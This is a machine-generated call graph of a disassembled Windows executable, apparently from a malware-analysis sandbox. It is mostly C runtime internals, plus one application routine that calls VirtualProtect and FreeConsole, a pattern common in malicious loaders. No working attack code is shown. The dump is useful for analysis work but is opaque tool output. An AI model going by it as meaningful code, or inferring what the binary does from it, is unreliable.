f2f46e 19591->19593 19594 f2f543 19592->19594 19598 f2f4bc 19592->19598 19595 f1e2cd __dosmaperr 14 API calls 19593->19595 19596 f1e2cd __dosmaperr 14 API calls 19594->19596 19597 f2f473 19595->19597 19599 f2f548 19596->19599 19600 f1e2e0 __Wcrtomb 14 API calls 19597->19600 19602 f2f4c5 19598->19602 19603 f2f4da 19598->19603 19604 f1e2e0 __Wcrtomb 14 API calls 19599->19604 19601 f26f8a 19600->19601 19601->19582 19601->19584 19605 f1e2cd __dosmaperr 14 API calls 19602->19605 19620 f2a908 EnterCriticalSection 19603->19620 19607 f2f4d2 19604->19607 19608 f2f4ca 19605->19608 19613 f1accf __strnicoll 41 API calls 19607->19613 19610 f1e2e0 __Wcrtomb 14 API calls 19608->19610 19609 f2f4e0 19611 f2f511 19609->19611 19612 f2f4fc 19609->19612 19610->19607 19621 f2f56e 19611->19621 19615 f1e2e0 __Wcrtomb 14 API calls 19612->19615 19613->19601 19616 f2f501 19615->19616 19617 f1e2cd __dosmaperr 14 API calls 19616->19617 19618 f2f50c 19617->19618 19684 f2f53b 19618->19684 19620->19609 19622 f2f580 19621->19622 19623 f2f598 19621->19623 19624 f1e2cd __dosmaperr 14 API calls 19622->19624 19625 f2f8ee 19623->19625 19630 f2f5de 19623->19630 19626 f2f585 19624->19626 19627 f1e2cd __dosmaperr 14 API calls 19625->19627 19628 f1e2e0 __Wcrtomb 14 API calls 19626->19628 19629 f2f8f3 19627->19629 19631 f2f58d 19628->19631 19632 f1e2e0 __Wcrtomb 14 API calls 19629->19632 19630->19631 19633 f2f5e9 19630->19633 19638 f2f619 19630->19638 19631->19618 19634 f2f5f6 19632->19634 19635 f1e2cd __dosmaperr 14 API calls 19633->19635 19639 f1accf __strnicoll 41 API calls 19634->19639 19636 f2f5ee 19635->19636 19637 f1e2e0 __Wcrtomb 14 API calls 19636->19637 19637->19634 19640 f2f632 19638->19640 19641 f2f64c 19638->19641 19642 f2f67d 19638->19642 19639->19631 19640->19641 19643 f2f637 19640->19643 19644 f1e2cd __dosmaperr 14 API calls 19641->19644 19645 f245c0 std::_Locinfo::_Locinfo_ctor 15 API calls 19642->19645 19693 f2ec51 19643->19693 19646 f2f651 19644->19646 19648 f2f68e 19645->19648 19649 f1e2e0 __Wcrtomb 14 API calls 19646->19649 19651 f24396 ___free_lconv_mon 14 API calls 19648->19651 19652 f2f658 19649->19652 19650 f2f7ca 19653 f2f83e 19650->19653 19657 f2f7e3 GetConsoleMode 19650->19657 19654 f2f697 19651->19654 19655 f1accf __strnicoll 41 API calls 19652->19655 19656 f2f842 ReadFile 19653->19656 19658 f24396 ___free_lconv_mon 14 API calls 19654->19658 19683 f2f663 19655->19683 19659 f2f8b6 GetLastError 19656->19659 19660 f2f85a 19656->19660 19657->19653 19661 f2f7f4 19657->19661 19662 f2f69e 19658->19662 19663 f2f8c3 19659->19663 19671 f2f81a 19659->19671 19660->19659 19669 f2f833 19660->19669 19661->19656 19664 f2f7fa ReadConsoleW 19661->19664 19665 f2f6c3 19662->19665 19666 f2f6a8 19662->19666 19667 f1e2e0 __Wcrtomb 14 API calls 19663->19667 19664->19669 19670 f2f814 GetLastError 19664->19670 19687 f28b59 19665->19687 19673 f1e2e0 __Wcrtomb 14 API calls 19666->19673 19674 f2f8c8 19667->19674 19678 f2f896 19669->19678 19679 f2f87f 19669->19679 19669->19683 19670->19671 19671->19683 19702 f1e286 19671->19702 19672 f24396 ___free_lconv_mon 14 API calls 19672->19631 19676 f2f6ad 19673->19676 19677 f1e2cd __dosmaperr 14 API calls 19674->19677 19680 f1e2cd __dosmaperr 14 API calls 19676->19680 19677->19683 19678->19683 19720 f2f0e0 19678->19720 19707 f2f288 19679->19707 19680->19683 19683->19672 19732 f2a92b LeaveCriticalSection 19684->19732 19686 f2f541 19686->19601 19688 f28b6d _Fputc 19687->19688 19689 f28a78 ___scrt_uninitialize_crt 43 API calls 19688->19689 19690 f28b82 19689->19690 19691 f1aa0b _Fputc 41 API calls 19690->19691 19692 f28b91 19691->19692 19692->19643 19694 f2ec6b 19693->19694 19695 f2ec5e 19693->19695 19698 f2ec77 19694->19698 19699 f1e2e0 __Wcrtomb 14 API calls 19694->19699 19696 f1e2e0 __Wcrtomb 14 API calls 19695->19696 19697 f2ec63 19696->19697 19697->19650 19698->19650 19700 f2ec98 19699->19700 19701 f1accf __strnicoll 41 API calls 19700->19701 19701->19697 19703 f1e2cd __dosmaperr 14 API calls 19702->19703 19704 f1e291 __dosmaperr 19703->19704 19705 f1e2e0 __Wcrtomb 14 API calls 19704->19705 19706 f1e2a4 19705->19706 19706->19683 19726 f2ef94 19707->19726 19709 f28f33 __strnicoll MultiByteToWideChar 19711 f2f39c 19709->19711 19713 f2f3a5 GetLastError 19711->19713 19716 f2f2d0 19711->19716 19712 f2f31a 19714 f1e2e0 __Wcrtomb 14 API calls 19712->19714 19717 f1e286 __dosmaperr 14 API calls 19713->19717 19714->19716 19715 f2f32a 19718 f2f2e4 19715->19718 19719 f28b59 43 API calls 19715->19719 19716->19683 19717->19716 19718->19709 19719->19718 19721 f2f117 19720->19721 19722 f2f1a7 19721->19722 19723 f2f1ac ReadFile 19721->19723 19722->19683 19723->19722 19724 f2f1c9 19723->19724 19724->19722 19725 f28b59 43 API calls 19724->19725 19725->19722 19727 f2efc8 19726->19727 19728 f2f032 19727->19728 19729 f2f037 ReadFile 19727->19729 19728->19712 19728->19715 19728->19716 19728->19718 19729->19728 19730 f2f050 19729->19730 19730->19728 19731 f28b59 43 API calls 19730->19731 19731->19728 19732->19686 21036 f1e3cb 21037 f1ef72 ___scrt_uninitialize_crt 70 API calls 21036->21037 21038 f1e3d3 21037->21038 21046 f26c56 21038->21046 21040 f1e3d8 21041 f26d01 14 API calls 21040->21041 21042 f1e3e7 DeleteCriticalSection 21041->21042 21042->21040 21043 f1e402 21042->21043 21044 f24396 ___free_lconv_mon 14 API calls 21043->21044 21045 f1e40d 21044->21045 21047 f26c62 __FrameHandler3::FrameUnwindToState 21046->21047 21056 f1d9e4 EnterCriticalSection 21047->21056 21049 f26cd9 21057 f26cf8 21049->21057 21052 f26cad DeleteCriticalSection 21054 f24396 ___free_lconv_mon 14 API calls 21052->21054 21053 f1ec37 71 API calls 21055 f26c6d 21053->21055 21054->21055 21055->21049 21055->21052 21055->21053 21056->21055 21060 f1da2c LeaveCriticalSection 21057->21060 21059 f26ce5 21059->21040 21060->21059 18986 f270b5 18987 f25466 _Ungetc 41 API calls 18986->18987 18989 f270c2 18987->18989 18988 f270ce 18989->18988 18992 f2711a 18989->18992 19009 f2744b 18989->19009 18990 f2717c 18998 f272a5 18990->18998 18992->18988 18992->18990 18993 f254cf 41 API calls 18992->18993 18995 f2716f 18993->18995 18995->18990 19017 f274e6 18995->19017 18999 f25466 _Ungetc 41 API calls 18998->18999 19000 f272b4 18999->19000 19001 f272c7 19000->19001 19002 f2735a 19000->19002 19004 f272e4 19001->19004 19005 f2730b 19001->19005 19003 f2801e ___scrt_uninitialize_crt 66 API calls 19002->19003 19007 f2718d 19003->19007 19006 f2801e ___scrt_uninitialize_crt 66 API calls 19004->19006 19005->19007 19022 f28afb 19005->19022 19006->19007 19010 f27461 19009->19010 19011 f27465 19009->19011 19010->18992 19012 f274b4 19011->19012 19013 f2a9df ___scrt_uninitialize_crt 41 API calls 19011->19013 19012->18992 19014 f27486 19013->19014 19014->19012 19015 f2748e SetFilePointerEx 19014->19015 19015->19012 19016 f274a5 GetFileSizeEx 19015->19016 19016->19012 19018 f24339 __dosmaperr 14 API calls 19017->19018 19019 f27503 19018->19019 19020 f24396 ___free_lconv_mon 14 API calls 19019->19020 19021 f2750d 19020->19021 19021->18990 19023 f28b0f _Fputc 19022->19023 19028 f28952 19023->19028 19026 f1aa0b _Fputc 41 API calls 19027 f28b33 19026->19027 19027->19007 19029 f2895e __FrameHandler3::FrameUnwindToState 19028->19029 19030 f28a3c 19029->19030 19032 f289ba 19029->19032 19038 f28966 19029->19038 19031 f1ac52 _Deallocate 29 API calls 19030->19031 19031->19038 19039 f2a908 EnterCriticalSection 19032->19039 19034 f289c0 19035 f289e5 19034->19035 19040 f28a78 19034->19040 19046 f28a34 19035->19046 19038->19026 19039->19034 19041 f2a9df ___scrt_uninitialize_crt 41 API calls 19040->19041 19042 f28a8a 19041->19042 19043 f28aa6 SetFilePointerEx 19042->19043 19045 f28a92 ___scrt_uninitialize_crt 19042->19045 19044 f28abe GetLastError 19043->19044 19043->19045 19044->19045 19045->19035 19049 f2a92b LeaveCriticalSection 19046->19049 19048 f28a3a 19048->19038 19049->19048 21104 f15ba5 21105 f15bb1 __EH_prolog3_GS 21104->21105 21107 f15c00 21105->21107 21111 f15c1a 21105->21111 21112 f15bc8 21105->21112 21118 f14c07 21107->21118 21115 f15cc9 21111->21115 21117 f15d04 21111->21117 21121 f1405f 21111->21121 21125 f1f017 21111->21125 21145 f162ce 21112->21145 21114 f13359 std::ios_base::_Init 41 API calls 21114->21112 21115->21114 21117->21115 21148 f1fac7 21117->21148 21161 f1e5af 21118->21161 21122 f14086 21121->21122 21123 f1406b 21121->21123 21245 f11b59 21122->21245 21123->21111 21126 f1f023 __FrameHandler3::FrameUnwindToState 21125->21126 21127 f1f045 21126->21127 21128 f1f02d 21126->21128 21254 f1e417 EnterCriticalSection 21127->21254 21130 f1e2e0 __Wcrtomb 14 API calls 21128->21130 21132 f1f032 21130->21132 21131 f1f04f 21133 f1f0eb 21131->21133 21135 f25466 _Ungetc 41 API calls 21131->21135 21134 f1accf __strnicoll 41 API calls 21132->21134 21255 f1efd0 21133->21255 21144 f1f03d 21134->21144 21140 f1f06c 21135->21140 21137 f1f0f1 21262 f1f11b 21137->21262 21139 f1f0c3 21141 f1e2e0 __Wcrtomb 14 API calls 21139->21141 21140->21133 21140->21139 21142 f1f0c8 21141->21142 21143 f1accf __strnicoll 41 API calls 21142->21143 21143->21144 21144->21111 21146 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21145->21146 21147 f162d8 21146->21147 21147->21147 21149 f1fad3 __FrameHandler3::FrameUnwindToState 21148->21149 21150 f1fada 21149->21150 21151 f1faef 21149->21151 21152 f1e2e0 __Wcrtomb 14 API calls 21150->21152 21266 f1e417 EnterCriticalSection 21151->21266 21154 f1fadf 21152->21154 21156 f1accf __strnicoll 41 API calls 21154->21156 21155 f1faf9 21267 f1f9ce 21155->21267 21158 f1faea 21156->21158 21158->21117 21162 f1e5bb __FrameHandler3::FrameUnwindToState 21161->21162 21163 f1e5c2 21162->21163 21164 f1e5d9 21162->21164 21165 f1e2e0 __Wcrtomb 14 API calls 21163->21165 21174 f1e417 EnterCriticalSection 21164->21174 21167 f1e5c7 21165->21167 21169 f1accf __strnicoll 41 API calls 21167->21169 21168 f1e5e5 21175 f1e43f 21168->21175 21172 f14c12 21169->21172 21171 f1e5f0 21209 f1e61e 21171->21209 21172->21112 21174->21168 21176 f1e4c2 21175->21176 21177 f1e45c 21175->21177 21180 f25466 _Ungetc 41 API calls 21176->21180 21181 f1e4b9 21176->21181 21178 f25466 _Ungetc 41 API calls 21177->21178 21179 f1e462 21178->21179 21183 f25466 _Ungetc 41 API calls 21179->21183 21198 f1e485 21179->21198 21182 f1e4d7 21180->21182 21181->21171 21185 f25466 _Ungetc 41 API calls 21182->21185 21201 f1e4fa 21182->21201 21184 f1e46e 21183->21184 21189 f25466 _Ungetc 41 API calls 21184->21189 21184->21198 21186 f1e4e3 21185->21186 21192 f25466 _Ungetc 41 API calls 21186->21192 21186->21201 21187 f1f00c 41 API calls 21188 f1e51a 21187->21188 21188->21181 21194 f1dcf2 __Getctype 41 API calls 21188->21194 21191 f1e47a 21189->21191 21195 f25466 _Ungetc 41 API calls 21191->21195 21196 f1e4ef 21192->21196 21193 f1e4a0 21193->21181 21212 f1f00c 21193->21212 21197 f1e532 21194->21197 21195->21198 21199 f25466 _Ungetc 41 API calls 21196->21199 21200 f1e55c 21197->21200 21202 f1f00c 41 API calls 21197->21202 21198->21176 21198->21193 21199->21201 21219 f2542f 21200->21219 21201->21181 21201->21187 21204 f1e543 21202->21204 21204->21200 21206 f1e549 21204->21206 21208 f1fac7 43 API calls 21206->21208 21207 f1e2e0 __Wcrtomb 14 API calls 21207->21181 21208->21181 21244 f1e42b LeaveCriticalSection 21209->21244 21211 f1e624 21211->21172 21213 f1efd0 21212->21213 21214 f1e2e0 __Wcrtomb 14 API calls 21213->21214 21215 f1eff1 21213->21215 21216 f1efe1 21214->21216 21215->21193 21217 f1accf __strnicoll 41 API calls 21216->21217 21218 f1efec 21217->21218 21218->21193 21220 f25442 _Fputc 21219->21220 21225 f252fc 21220->21225 21223 f1aa0b _Fputc 41 API calls 21224 f1e570 21223->21224 21224->21181 21224->21207 21227 f25310 21225->21227 21234 f25320 21225->21234 21226 f25345 21229 f25356 21226->21229 21230 f25379 21226->21230 21227->21226 21228 f1b7f0 _Fputc 41 API calls 21227->21228 21227->21234 21228->21226 21237 f2eb06 21229->21237 21232 f253a1 21230->21232 21233 f253f5 21230->21233 21230->21234 21232->21234 21236 f28f33 __strnicoll MultiByteToWideChar 21232->21236 21235 f28f33 __strnicoll MultiByteToWideChar 21233->21235 21234->21223 21235->21234 21236->21234 21240 f307a3 21237->21240 21243 f307ce _Fputc 21240->21243 21241 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21242 f2eb21 21241->21242 21242->21234 21243->21241 21244->21211 21246 f11b72 std::ios_base::_Init 21245->21246 21247 f11bde 21245->21247 21250 f1116b std::ios_base::_Init 43 API calls 21246->21250 21248 f133a8 std::ios_base::_Init 43 API calls 21247->21248 21249 f11be3 21248->21249 21251 f11b91 21250->21251 21252 f113c0 _Deallocate 41 API calls 21251->21252 21253 f11bc3 21251->21253 21252->21253 21253->21123 21254->21131 21256 f1efdc 21255->21256 21260 f1eff1 21255->21260 21257 f1e2e0 __Wcrtomb 14 API calls 21256->21257 21258 f1efe1 21257->21258 21259 f1accf __strnicoll 41 API calls 21258->21259 21261 f1efec 21259->21261 21260->21137 21261->21137 21265 f1e42b LeaveCriticalSection 21262->21265 21264 f1f121 21264->21144 21265->21264 21266->21155 21268 f1f9e6 21267->21268 21270 f1fa56 21267->21270 21269 f25466 _Ungetc 41 API calls 21268->21269 21276 f1f9ec 21269->21276 21271 f274e6 _Ungetc 14 API calls 21270->21271 21272 f1fa4e 21270->21272 21271->21272 21278 f1fb32 21272->21278 21273 f1fa3e 21274 f1e2e0 __Wcrtomb 14 API calls 21273->21274 21275 f1fa43 21274->21275 21277 f1accf __strnicoll 41 API calls 21275->21277 21276->21270 21276->21273 21277->21272 21281 f1e42b LeaveCriticalSection 21278->21281 21280 f1fb38 21280->21158 21281->21280 21282 f22fa7 21283 f22fb2 21282->21283 21284 f22fc2 21282->21284 21288 f22fc8 21283->21288 21287 f24396 ___free_lconv_mon 14 API calls 21287->21284 21289 f22fe3 21288->21289 21290 f22fdd 21288->21290 21292 f24396 ___free_lconv_mon 14 API calls 21289->21292 21291 f24396 ___free_lconv_mon 14 API calls 21290->21291 21291->21289 21293 f22fef 21292->21293 21294 f24396 ___free_lconv_mon 14 API calls 21293->21294 21295 f22ffa 21294->21295 21296 f24396 ___free_lconv_mon 14 API calls 21295->21296 21297 f23005 21296->21297 21298 f24396 ___free_lconv_mon 14 API calls 21297->21298 21299 f23010 21298->21299 21300 f24396 ___free_lconv_mon 14 API calls 21299->21300 21301 f2301b 21300->21301 21302 f24396 ___free_lconv_mon 14 API calls 21301->21302 21303 f23026 21302->21303 21304 f24396 ___free_lconv_mon 14 API calls 21303->21304 21305 f23031 21304->21305 21306 f24396 ___free_lconv_mon 14 API calls 21305->21306 21307 f2303c 21306->21307 21308 f24396 ___free_lconv_mon 14 API calls 21307->21308 21309 f2304a 21308->21309 21314 f22df4 21309->21314 21315 f22e00 __FrameHandler3::FrameUnwindToState 21314->21315 21330 f1d9e4 EnterCriticalSection 21315->21330 21317 f22e34 21331 f22e53 21317->21331 21319 f22e0a 21319->21317 21321 f24396 ___free_lconv_mon 14 API calls 21319->21321 21321->21317 21322 f22e5f 21323 f22e6b __FrameHandler3::FrameUnwindToState 21322->21323 21335 f1d9e4 EnterCriticalSection 21323->21335 21325 f22e75 21326 f23095 __dosmaperr 14 API calls 21325->21326 21327 f22e88 21326->21327 21336 f22ea8 21327->21336 21330->21319 21334 f1da2c LeaveCriticalSection 21331->21334 21333 f22e41 21333->21322 21334->21333 21335->21325 21339 f1da2c LeaveCriticalSection 21336->21339 21338 f22e96 21338->21287 21339->21338 21389 f2cd9a 21390 f2cdb3 21389->21390 21391 f2cdd1 21389->21391 21390->21391 21392 f256aa 2 API calls 21390->21392 21392->21390 19050 f1418d 19051 f14195 19050->19051 19052 f1419d 19051->19052 19053 f157bd 70 API calls 19051->19053 19053->19052 21602 f15976 21603 f1598a 21602->21603 21604 f15166 69 API calls 21603->21604 21609 f159e5 21603->21609 21605 f159b5 21604->21605 21606 f159d2 21605->21606 21607 f1f494 68 API calls 21605->21607 21605->21609 21606->21609 21610 f1f123 21606->21610 21607->21606 21611 f1f143 21610->21611 21612 f1f12e 21610->21612 21613 f1f160 21611->21613 21614 f1f14b 21611->21614 21615 f1e2e0 __Wcrtomb 14 API calls 21612->21615 21624 f28911 21613->21624 21617 f1e2e0 __Wcrtomb 14 API calls 21614->21617 21616 f1f133 21615->21616 21619 f1accf __strnicoll 41 API calls 21616->21619 21620 f1f150 21617->21620 21622 f1f13e 21619->21622 21623 f1accf __strnicoll 41 API calls 21620->21623 21621 f1f15b 21621->21609 21622->21609 21623->21621 21625 f28925 _Fputc 21624->21625 21630 f28326 21625->21630 21628 f1aa0b _Fputc 41 API calls 21629 f2893f 21628->21629 21629->21621 21631 f28332 __FrameHandler3::FrameUnwindToState 21630->21631 21632 f28339 21631->21632 21633 f2835c 21631->21633 21634 f1ac52 _Deallocate 29 API calls 21632->21634 21641 f1e417 EnterCriticalSection 21633->21641 21640 f28352 21634->21640 21636 f2836a 21642 f283b5 21636->21642 21638 f28379 21655 f283ab 21638->21655 21640->21628 21641->21636 21643 f283c4 21642->21643 21644 f283ec 21642->21644 21645 f1ac52 _Deallocate 29 API calls 21643->21645 21646 f25466 _Ungetc 41 API calls 21644->21646 21652 f283df __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21645->21652 21647 f283f5 21646->21647 21658 f28b3b 21647->21658 21650 f2849f 21661 f28715 21650->21661 21652->21638 21653 f284b6 21653->21652 21673 f28556 21653->21673 21680 f1e42b LeaveCriticalSection 21655->21680 21657 f283b3 21657->21640 21659 f28952 45 API calls 21658->21659 21660 f28413 21659->21660 21660->21650 21660->21652 21660->21653 21662 f28724 ___scrt_uninitialize_crt 21661->21662 21663 f25466 _Ungetc 41 API calls 21662->21663 21665 f28740 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21663->21665 21664 f162ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21666 f288be 21664->21666 21667 f28b3b 45 API calls 21665->21667 21672 f2874c 21665->21672 21666->21652 21668 f287a0 21667->21668 21669 f287d2 ReadFile 21668->21669 21668->21672 21670 f287f9 21669->21670 21669->21672 21671 f28b3b 45 API calls 21670->21671 21671->21672 21672->21664 21674 f25466 _Ungetc 41 API calls 21673->21674 21675 f28569 21674->21675 21676 f28b3b 45 API calls 21675->21676 21679 f285b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21675->21679 21677 f28604 21676->21677 21678 f28b3b 45 API calls 21677->21678 21677->21679 21678->21679 21679->21652 21680->21657 21740 f15b60 21741 f15b9e 21740->21741 21742 f15b69 21740->21742 21742->21741 21745 f1ef7b 21742->21745 21744 f15b91 21746 f1ef8d 21745->21746 21750 f1ef96 ___scrt_uninitialize_crt 21745->21750 21747 f1edff ___scrt_uninitialize_crt 70 API calls 21746->21747 21748 f1ef93 21747->21748 21748->21744 21749 f1efa7 21749->21744 21750->21749 21753 f1ed9f 21750->21753 21754 f1edab __FrameHandler3::FrameUnwindToState 21753->21754 21761 f1e417 EnterCriticalSection 21754->21761 21756 f1edb9 21757 f1ef0d ___scrt_uninitialize_crt 70 API calls 21756->21757 21758 f1edca 21757->21758 21762 f1edf3 21758->21762 21761->21756 21765 f1e42b LeaveCriticalSection 21762->21765 21764 f1eddc 21764->21744 21765->21764 18179 f16464 18180 f16470 __FrameHandler3::FrameUnwindToState 18179->18180 18205 f16666 18180->18205 18182 f16477 18183 f165d0 18182->18183 18186 f164a1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 18182->18186 18254 f16d9f IsProcessorFeaturePresent 18183->18254 18185 f165d7 18234 f20f94 18185->18234 18191 f164c0 18186->18191 18192 f16541 18186->18192 18237 f20f6e 18186->18237 18189 f20f58 std::locale::_Setgloballocale 23 API calls 18190 f165e5 18189->18190 18216 f20bd2 18192->18216 18195 f16547 18220 f33416 18195->18220 18206 f1666f 18205->18206 18258 f1687c IsProcessorFeaturePresent 18206->18258 18210 f16684 18210->18182 18211 f16680 18211->18210 18268 f22bab 18211->18268 18214 f1669b 18214->18182 18217 f20be0 18216->18217 18218 f20bdb 18216->18218 18217->18195 18340 f2092c 18218->18340 18637 f11f47 18220->18637 18223 f1626e codecvt 43 API calls 18224 f3343b 18223->18224 18225 f3344b VirtualProtect FreeConsole 18224->18225 18646 f33000 18224->18646 18641 f3339a 18225->18641 18235 f20d7c std::locale::_Setgloballocale 23 API calls 18234->18235 18236 f165dd 18235->18236 18236->18189 18238 f20f84 __FrameHandler3::FrameUnwindToState __dosmaperr 18237->18238 18238->18192 18239 f230e0 __Getctype 41 API calls 18238->18239 18242 f22c5d 18239->18242 18240 f200d9 __purecall 41 API calls 18241 f22c87 18240->18241 18242->18240 18255 f16db5 codecvt std::locale::_Setgloballocale 18254->18255 18256 f16e60 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18255->18256 18257 f16ea4 std::locale::_Setgloballocale 18256->18257 18257->18185 18259 f1667b 18258->18259 18260 f195de 18259->18260 18277 f1a6b7 18260->18277 18264 f195ef 18265 f195fa 18264->18265 18291 f1a6f3 18264->18291 18265->18211 18267 f195e7 18267->18211 18331 f2cda3 18268->18331 18271 f195fd 18272 f19610 18271->18272 18273 f19606 18271->18273 18272->18210 18274 f19776 ___vcrt_uninitialize_ptd 6 API calls 18273->18274 18275 f1960b 18274->18275 18276 f1a6f3 ___vcrt_uninitialize_locks DeleteCriticalSection 18275->18276 18276->18272 18278 f1a6c0 18277->18278 18280 f1a6e9 18278->18280 18281 f195e3 18278->18281 18295 f1a8fc 18278->18295 18282 f1a6f3 ___vcrt_uninitialize_locks DeleteCriticalSection 18280->18282 18281->18267 18283 f19743 18281->18283 18282->18281 18312 f1a80d 18283->18312 18285 f19758 18285->18264 18289 f19773 18289->18264 18292 f1a71d 18291->18292 18293 f1a6fe 18291->18293 18292->18267 18294 f1a708 DeleteCriticalSection 18293->18294 18294->18292 18294->18294 18300 f1a722 18295->18300 18298 f1a934 InitializeCriticalSectionAndSpinCount 18299 f1a91f 18298->18299 18299->18278 18301 f1a73f 18300->18301 18304 f1a743 18300->18304 18301->18298 18301->18299 18303 f1a7ab GetProcAddress 18303->18301 18304->18301 18304->18303 18305 f1a79c 18304->18305 18307 f1a7c2 LoadLibraryExW 18304->18307 18305->18303 18306 f1a7a4 FreeLibrary 18305->18306 18306->18303 18308 f1a7d9 GetLastError 18307->18308 18309 f1a809 18307->18309 18308->18309 18310 f1a7e4 ___vcrt_InitializeCriticalSectionEx 18308->18310 18309->18304 18310->18309 18311 f1a7fa LoadLibraryExW 18310->18311 18311->18304 18313 f1a722 ___vcrt_InitializeCriticalSectionEx 5 API calls 18312->18313 18314 f1a827 18313->18314 18315 f1a840 TlsAlloc 18314->18315 18316 f1974d 18314->18316 18316->18285 18317 f1a8be 18316->18317 18318 f1a722 ___vcrt_InitializeCriticalSectionEx 5 API calls 18317->18318 18319 f1a8d8 18318->18319 18320 f1a8f3 TlsSetValue 18319->18320 18321 f19766 18319->18321 18320->18321 18321->18289 18322 f19776 18321->18322 18323 f19780 18322->18323 18325 f19786 18322->18325 18326 f1a848 18323->18326 18325->18285 18327 f1a722 ___vcrt_InitializeCriticalSectionEx 5 API calls 18326->18327 18328 f1a862 18327->18328 18329 f1a87a TlsFree 18328->18329 18330 f1a86e 18328->18330 18329->18330 18330->18325 18332 f2cdb3 18331->18332 18333 f1668d 18331->18333 18332->18333 18335 f256aa 18332->18335 18333->18214 18333->18271 18336 f256b1 18335->18336 18337 f256f4 GetStdHandle 18336->18337 18338 f25756 18336->18338 18339 f25707 GetFileType 18336->18339 18337->18336 18338->18332 18339->18336 18341 f20935 18340->18341 18344 f2094b 18340->18344 18341->18344 18346 f20958 18341->18346 18343 f20942 18343->18344 18363 f20ac3 18343->18363 18344->18217 18347 f20961 18346->18347 18348 f20964 18346->18348 18347->18343 18371 f2a05f 18348->18371 18353 f20981 18398 f209b2 18353->18398 18354 f20975 18355 f24396 ___free_lconv_mon 14 API calls 18354->18355 18357 f2097b 18355->18357 18357->18343 18359 f24396 ___free_lconv_mon 14 API calls 18360 f209a5 18359->18360 18361 f24396 ___free_lconv_mon 14 API calls 18360->18361 18362 f209ab 18361->18362 18362->18343 18364 f20b34 18363->18364 18366 f20ad2 18363->18366 18364->18344 18365 f28faf WideCharToMultiByte _Fputc 18365->18366 18366->18364 18366->18365 18367 f24339 __dosmaperr 14 API calls 18366->18367 18369 f20b38 18366->18369 18370 f24396 ___free_lconv_mon 14 API calls 18366->18370 18367->18366 18368 f24396 ___free_lconv_mon 14 API calls 18368->18364 18369->18368 18370->18366 18372 f2a068 18371->18372 18376 f2096a 18371->18376 18420 f2319b 18372->18420 18377 f2a361 GetEnvironmentStringsW 18376->18377 18378 f2a379 18377->18378 18383 f2096f 18377->18383 18379 f28faf _Fputc WideCharToMultiByte 18378->18379 18380 f2a396 18379->18380 18381 f2a3a0 FreeEnvironmentStringsW 18380->18381 18382 f2a3ab 18380->18382 18381->18383 18384 f245c0 std::_Locinfo::_Locinfo_ctor 15 API calls 18382->18384 18383->18353 18383->18354 18385 f2a3b2 18384->18385 18386 f2a3ba 18385->18386 18387 f2a3cb 18385->18387 18388 f24396 ___free_lconv_mon 14 API calls 18386->18388 18389 f28faf _Fputc WideCharToMultiByte 18387->18389 18390 f2a3bf FreeEnvironmentStringsW 18388->18390 18391 f2a3db 18389->18391 18390->18383 18392 f2a3e2 18391->18392 18393 f2a3ea 18391->18393 18394 f24396 ___free_lconv_mon 14 API calls 18392->18394 18395 f24396 ___free_lconv_mon 14 API calls 18393->18395 18396 f2a3e8 FreeEnvironmentStringsW 18394->18396 18395->18396 18396->18383 18399 f209c7 18398->18399 18400 f24339 __dosmaperr 14 API calls 18399->18400 18401 f209ee 18400->18401 18402 f209f6 18401->18402 18411 f20a00 18401->18411 18403 f24396 ___free_lconv_mon 14 API calls 18402->18403 18419 f20988 18403->18419 18404 f20a5d 18405 f24396 ___free_lconv_mon 14 API calls 18404->18405 18405->18419 18406 f24339 __dosmaperr 14 API calls 18406->18411 18407 f20a6c 18631 f20a94 18407->18631 18409 f22c88 ___std_exception_copy 41 API calls 18409->18411 18411->18404 18411->18406 18411->18407 18411->18409 18413 f20a87 18411->18413 18415 f24396 ___free_lconv_mon 14 API calls 18411->18415 18412 f24396 ___free_lconv_mon 14 API calls 18414 f20a79 18412->18414 18416 f1acfc _Deallocate 11 API calls 18413->18416 18417 f24396 ___free_lconv_mon 14 API calls 18414->18417 18415->18411 18418 f20a93 18416->18418 18417->18419 18419->18359 18421 f231a6 18420->18421 18422 f231ac 18420->18422 18423 f25c98 __dosmaperr 6 API calls 18421->18423 18424 f25cd7 __dosmaperr 6 API calls 18422->18424 18426 f231b2 18422->18426 18423->18422 18425 f231c6 18424->18425 18425->18426 18427 f231ca 18425->18427 18429 f200d9 __purecall 41 API calls 18426->18429 18430 f231b7 18426->18430 18428 f24339 __dosmaperr 14 API calls 18427->18428 18431 f231d6 18428->18431 18432 f23230 18429->18432 18448 f29e6a 18430->18448 18433 f231f3 18431->18433 18434 f231de 18431->18434 18435 f25cd7 __dosmaperr 6 API calls 18433->18435 18436 f25cd7 __dosmaperr 6 API calls 18434->18436 18437 f231ff 18435->18437 18438 f231ea 18436->18438 18439 f23212 18437->18439 18440 f23203 18437->18440 18443 f24396 ___free_lconv_mon 14 API calls 18438->18443 18442 f22f0e __dosmaperr 14 API calls 18439->18442 18441 f25cd7 __dosmaperr 6 API calls 18440->18441 18441->18438 18445 f2321d 18442->18445 18444 f231f0 18443->18444 18444->18426 18446 f24396 ___free_lconv_mon 14 API calls 18445->18446 18447 f23224 18446->18447 18447->18430 18471 f29fbf 18448->18471 18453 f29ead 18453->18376 18454 f245c0 std::_Locinfo::_Locinfo_ctor 15 API calls 18455 f29ebe 18454->18455 18456 f29ec6 18455->18456 18457 f29ed4 18455->18457 18459 f24396 ___free_lconv_mon 14 API calls 18456->18459 18489 f2a0ba 18457->18489 18459->18453 18472 f29fcb __FrameHandler3::FrameUnwindToState 18471->18472 18473 f29fe5 18472->18473 18508 f1d9e4 EnterCriticalSection 18472->18508 18475 f29e94 18473->18475 18478 f200d9 __purecall 41 API calls 18473->18478 18482 f29bea 18475->18482 18476 f2a021 18509 f2a03e 18476->18509 18479 f2a05e 18478->18479 18480 f29ff5 18480->18476 18481 f24396 ___free_lconv_mon 14 API calls 18480->18481 18481->18476 18513 f1fb3a 18482->18513 18485 f29c0b GetOEMCP 18487 f29c34 18485->18487 18486 f29c1d 18486->18487 18488 f29c22 GetACP 